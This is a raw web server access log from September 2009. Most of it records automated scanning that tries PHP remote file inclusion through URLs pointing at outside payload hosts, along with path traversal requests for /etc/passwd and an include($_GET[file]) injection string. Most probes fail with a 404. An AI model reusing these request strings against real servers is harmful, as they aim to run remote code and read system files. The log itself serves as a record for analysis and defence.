211.189.18.73 - - [10/Sep/2009:20:52:04 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
91.202.4.158 - - [10/Sep/2009:20:56:18 -0500] "GET //page.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
91.202.4.158 - - [10/Sep/2009:20:56:18 -0500] "GET /logs//page.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
91.202.4.158 - - [10/Sep/2009:20:56:18 -0500] "GET //page.php?id=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
91.202.4.158 - - [10/Sep/2009:20:56:19 -0500] "GET /logs//page.php?id=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
65.55.208.119 - - [10/Sep/2009:21:05:04 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [10/Sep/2009:21:05:05 -0500] "GET /logs/access_log.1249430400 HTTP/1.1" 200 536015 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.148.68.101 - - [10/Sep/2009:21:12:17 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.68.101 - - [10/Sep/2009:21:12:17 -0500] "GET /logs/access_log.1247443200/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.68.101 - - [10/Sep/2009:21:12:17 -0500] "GET /logs/access_log.1246752000/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.68.101 - - [10/Sep/2009:21:12:19 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:14:27 -0500] "GET /principal.php?conteudo=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:14:27 -0500] "GET /logs/access_log.1251763200/principal.php?conteudo=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:14:27 -0500] "GET /logs/principal.php?conteudo=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:18:36 -0500] "GET /logs/index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:18:36 -0500] "GET /index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:18:36 -0500] "GET /logs/access_log.1247961600/index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:18:36 -0500] "GET /logs/access_log.1247875200/index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.207.99 - - [10/Sep/2009:21:19:49 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.116.209 - - [10/Sep/2009:21:20:35 -0500] "GET /logs/access_log.1243036800/index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.207.99 - - [10/Sep/2009:21:21:37 -0500] "GET /logs/access_log.1204156800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.116.209 - - [10/Sep/2009:21:21:56 -0500] "GET /index.php?conteudo=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:21:56 -0500] "GET /logs/access_log.1244764800/index.php?conteudo=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:21:21:57 -0500] "GET /logs/index.php?conteudo=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:28:08 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:28:09 -0500] "GET /logs/access_log.1244764800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:28:09 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:39:50 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:39:51 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:39:53 -0500] "GET /logs/access_log.1244764800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
98.116.62.213 - - [10/Sep/2009:21:42:29 -0500] "GET /logs//setup.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
98.116.62.213 - - [10/Sep/2009:21:42:29 -0500] "GET /logs/access_log.1251763200//setup.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
98.116.62.213 - - [10/Sep/2009:21:42:29 -0500] "GET //setup.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.90.108.169 - - [10/Sep/2009:21:46:49 -0500] "GET //install.serverstat.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
70.90.108.169 - - [10/Sep/2009:21:46:49 -0500] "GET /logs/access_log.1244764800//install.serverstat.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
70.90.108.169 - - [10/Sep/2009:21:46:49 -0500] "GET /logs//install.serverstat.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:21:47:12 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.standrewkimchicago.org//samok/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:21:47:12 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.standrewkimchicago.org//samok/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:21:47:12 -0500] "GET /logs/access_log.1236211200//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.standrewkimchicago.org//samok/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.160 - - [10/Sep/2009:21:47:38 -0500] "GET /logs/access_log.1118275200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.100.186.87 - - [10/Sep/2009:21:50:21 -0500] "GET /logs/access_log.1236038400//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.standrewkimchicago.org//samok/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:50:34 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:50:52 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:50:56 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
72.51.42.92 - - [10/Sep/2009:21:53:04 -0500] "GET /logs/access_log.1244764800/htmltonuke.php?filnavn=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.51.42.92 - - [10/Sep/2009:21:53:04 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.51.42.92 - - [10/Sep/2009:21:53:04 -0500] "GET /htmltonuke.php?filnavn=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
204.30.3.225 - - [10/Sep/2009:21:53:30 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
204.30.3.225 - - [10/Sep/2009:21:53:30 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:21:53:41 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:21:53:41 -0500] "GET /logs/access_log.1228608000%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:21:53:41 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
204.30.3.225 - - [10/Sep/2009:21:53:44 -0500] "GET /logs/access_log.1244764800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:54:15 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:54:18 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
72.51.42.92 - - [10/Sep/2009:21:54:28 -0500] "GET /logs/access_log.1244160000/htmltonuke.php?filnavn=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:21:54:34 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:21:54:34 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:21:54:34 -0500] "GET /logs/access_log.1228608000%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.106.229 - - [10/Sep/2009:21:54:36 -0500] "GET /logs/access_log.1213142400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
117.110.59.2 - - [10/Sep/2009:21:54:41 -0500] "GET /logs/access_log.1240531200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
204.30.3.225 - - [10/Sep/2009:21:55:28 -0500] "GET /logs/access_log.1244505600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:55:36 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:21:55:37 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:21:57:07 -0500] "GET /logs/access_log.1250985600//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:21:57:07 -0500] "GET //galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:21:57:07 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:21:57:29 -0500] "GET /logs/access_log.1246924800//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:22:00:28 -0500] "GET /htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:22:00:29 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:22:00:29 -0500] "GET /logs/access_log.1244764800/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:22:01:43 -0500] "GET /logs/access_log.1240531200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:22:02:37 -0500] "GET /logs/access_log.1244160000/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:03:28 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:03:28 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
114.4.8.14 - - [10/Sep/2009:22:03:28 -0500] "GET /logs/access_log.1248048000////skin/ggambo7002_board/comment_modify.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:22:04:12 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:22:04:12 -0500] "GET /logs/access_log.1244764800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:22:04:17 -0500] "GET /logs/access_log.1247961600//dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:22:04:17 -0500] "GET /logs//dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:22:04:17 -0500] "GET //dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:22:04:18 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:22:04:23 -0500] "GET /logs//dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:22:04:23 -0500] "GET //dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:22:04:23 -0500] "GET /logs/access_log.1247961600//dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:22:04:30 -0500] "GET /logs/access_log.1250985600//dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:22:04:34 -0500] "GET /logs/access_log.1250985600//dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
206.225.23.4 - - [10/Sep/2009:22:04:54 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
206.225.23.4 - - [10/Sep/2009:22:04:54 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
206.225.23.4 - - [10/Sep/2009:22:04:54 -0500] "GET /logs/access_log.1244160000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
206.225.23.4 - - [10/Sep/2009:22:04:54 -0500] "GET /logs/access_log.1244764800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:22:04:57 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:22:04:57 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:22:04:57 -0500] "GET /logs/access_log.1236038400//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.107.180 - - [10/Sep/2009:22:06:36 -0500] "GET /logs/access_log.1107216000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.225.23.4 - - [10/Sep/2009:22:07:44 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
206.225.23.4 - - [10/Sep/2009:22:07:44 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
206.225.23.4 - - [10/Sep/2009:22:07:44 -0500] "GET /logs/access_log.1244160000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
206.225.23.4 - - [10/Sep/2009:22:07:48 -0500] "GET /logs/access_log.1244764800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:22:09:15 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:22:09:15 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:22:09:15 -0500] "GET /logs/access_log.1244160000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:22:09:16 -0500] "GET /logs/access_log.1244764800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:22:09:40 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:22:09:40 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:22:09:40 -0500] "GET /logs/access_log.1244160000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
61.100.5.136 - - [10/Sep/2009:22:09:55 -0500] "GET /logs/access_log.1244764800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
67.218.116.131 - - [10/Sep/2009:22:10:44 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
70.90.108.169 - - [10/Sep/2009:22:10:44 -0500] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
70.90.108.169 - - [10/Sep/2009:22:10:44 -0500] "GET //admin.joomlaradiov5.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
70.90.108.169 - - [10/Sep/2009:22:10:44 -0500] "GET /logs/access_log.1247184000//admin.joomlaradiov5.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.157.45.177 - - [10/Sep/2009:22:10:49 -0500] "GET /logs//kalender.php?vis=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""-"
88.157.45.177 - - [10/Sep/2009:22:10:49 -0500] "GET //kalender.php?vis=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""-"
88.157.45.177 - - [10/Sep/2009:22:10:49 -0500] "GET /logs//kalender.php?vis=./../../../../../../../../etc/passwd HTTP/1.1" 404 301 "-""-"
88.157.45.177 - - [10/Sep/2009:22:10:50 -0500] "GET //kalender.php?vis=./../../../../../../../../etc/passwd HTTP/1.1" 404 296 "-""-"
121.78.116.209 - - [10/Sep/2009:22:11:37 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:22:11:37 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.116.209 - - [10/Sep/2009:22:11:37 -0500] "GET /logs/access_log.1244764800//modules/agendax/addevent.inc.php?agendax_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.55.106.136 - - [10/Sep/2009:22:15:07 -0500] "GET /logs/access_log.1161475200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.102 - - [10/Sep/2009:22:16:08 -0500] "GET /logs/access_log.1167696000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.116.209 - - [10/Sep/2009:22:17:20 -0500] "GET /logs/access_log.1247961600/index.phpmain.php?x=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
